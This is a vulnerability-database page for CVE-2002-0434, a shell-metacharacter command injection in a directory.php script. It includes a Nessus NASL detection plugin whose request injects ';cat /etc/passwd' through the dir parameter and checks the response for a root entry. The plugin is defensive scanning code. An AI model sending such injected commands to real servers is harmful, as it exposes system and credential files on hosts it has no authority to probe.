Vulnerabilities > CVE-2002-0434 - Unspecified vulnerability in Marcus S. Xenakis Directory.PHP

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN

Summary

Marcus S. Xenakis directory.php script allows remote attackers to execute arbitrary commands via shell metacharacters in the dir parameter.

Vulnerable Configurations

Part Description Count
Application
Marcus_S._Xenakis
1

Nessus

NASL familyCGI abuses
NASL idDIRECTORYPHP.NASL
descriptionThe
last seen2020-06-01
modified2020-06-02
plugin id11017
published2002-06-07
reporterThis script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/11017
titleMarcus Xenakis directory.php Execute Arbitrary Commands
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if(description)
{
 script_id(11017);
 script_version ("1.28");
 script_cve_id("CVE-2002-0434");
 script_bugtraq_id(4278);

 script_name(english:"Marcus Xenakis directory.php Execute Arbitrary Commands");
 
 script_set_attribute(attribute:"synopsis", value:
"Arbitrary code can run on the remote host." );
 script_set_attribute(attribute:"description", value:
"The 'directory.php' file is installed. 
1. This tool allows anybody to read any directory.
2. It is possible to execute arbitrary code with the rights 
   of the HTTP server." );
 script_set_attribute(attribute:"solution", value:
"Remove 'directory.php'." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"plugin_publication_date", value: "2002/06/07");
 script_set_attribute(attribute:"vuln_publication_date", value: "2002/03/10");
 script_cvs_date("Date: 2018/06/14 12:21:47");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 script_summary(english:"Checks for the presence of /directory.php");
 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");
 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_keys("www/PHP");
 exit(0);
}

#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80, embedded: 0);

if(!can_host_php(port:port)) exit(0);

foreach dir (cgi_dirs())
{
 r = http_send_recv3(method: "GET", port:port, item:string(dir, "/directory.php?dir=%3Bcat%20/etc/passwd"));
 if (isnull(r)) exit(0);
 if (egrep(pattern:".*root:.*:0:[01]:.*", string:r[1]+r[2]))
 {	
 	security_hole(port);
        exit(0);
 }
}